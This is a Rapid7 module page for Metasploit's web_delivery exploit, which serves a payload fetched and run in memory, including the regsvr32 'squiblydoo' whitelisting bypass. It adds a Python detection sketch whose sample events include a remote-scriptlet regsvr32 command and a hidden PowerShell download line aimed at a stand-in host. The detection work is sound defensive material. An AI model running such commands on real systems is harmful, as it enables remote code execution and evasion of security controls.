Rapid7 Vulnerability & Exploit Database

Script Web Delivery

Disclosed: 07/19/2013
Created: 05/30/2018

Description

This module quickly fires up a web server that serves a payload. The command it provides downloads and executes that payload, either through the specified scripting language interpreter or through "squiblydoo" via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to type in the command manually, e.g. command injection, an RDP session, local access or remote command execution.

This attack vector does not write to disk, so it is less likely to trigger AV solutions, and it allows the privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer, or use the SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

The Regsvr32 target uses the "squiblydoo" technique for bypassing application whitelisting: the signed Microsoft binary, Regsvr32, is able to request an .sct file and then execute the PowerShell command included in it. Both web requests (i.e., the .sct file and the PowerShell download/execute) can occur on the same port. "PSH (Binary)" will write a file to the disk, allowing custom binaries to be served up to be downloaded and executed.
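From the defender's side, the behaviour described above is visible in process-creation telemetry: regsvr32.exe or a script interpreter started with an HTTP(S) URL on its command line. The following is an added detection sketch, not code from the module or from Rapid7; the event tuples, rule names and the 198.51.100.7 address are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
INTERPRETERS = {"powershell.exe", "python.exe", "php.exe"}  # the module's platforms

# Constructed process-creation events (image, command line). Addresses use the
# documentation range 198.51.100.0/24; "..." marks a deliberately elided body.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),
    (r"C:\Windows\System32\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://198.51.100.7:8080/a.sct scrobj.dll"),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -c \"... 'http://198.51.100.7:8080/a' ...\""),
    (r"C:\Python311\python.exe", r"python.exe C:\jobs\nightly_report.py"),
]


def classify(image, cmdline):
    """Return a finding dict for a suspicious process start, else None."""
    exe = PureWindowsPath(image).name.lower()
    urls = URL_RE.findall(cmdline)
    if not urls:
        return None  # local DLL registration or local script: not this pattern
    lowered = cmdline.lower()
    if exe == "regsvr32.exe":
        # regsvr32 has no routine reason to be handed a URL; a remote .sct
        # together with scrobj.dll is the scriptlet fetch the page describes.
        scriptlet = "scrobj.dll" in lowered or any(
            u.lower().endswith(".sct") for u in urls)
        rule = "regsvr32_remote_scriptlet" if scriptlet else "regsvr32_url_argument"
    elif exe in INTERPRETERS:
        rule = "interpreter_url_in_cmdline"
    else:
        return None
    return {"rule": rule, "exe": exe, "urls": urls,
            # 32-bit PowerShell on a 64-bit host, as the page notes for x86 payloads
            "wow64": "\\syswow64\\" in image.lower()}


def scan(events):
    """Classify every (image, cmdline) pair and keep only the findings."""
    return [f for f in (classify(i, c) for i, c in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The interpreter rule is a triage signal rather than a verdict, since legitimate tooling also passes URLs to interpreters; the regsvr32 rule is the higher-confidence one.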

Author(s)

  • Andrew Smith "jakx" <jakx.ppr@gmail.com>
  • Ben Campbell <eat_meatballs@hotmail.co.uk>
  • Chris Campbell
  • Casey Smith
  • Trenton Ivey
  • g0tmi1k

Platform

PHP, Python, Windows

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show targets
    ...targets...
msf exploit(web_delivery) > set TARGET <target-id>
msf exploit(web_delivery) > show options
    ...show and set options...
msf exploit(web_delivery) > exploit
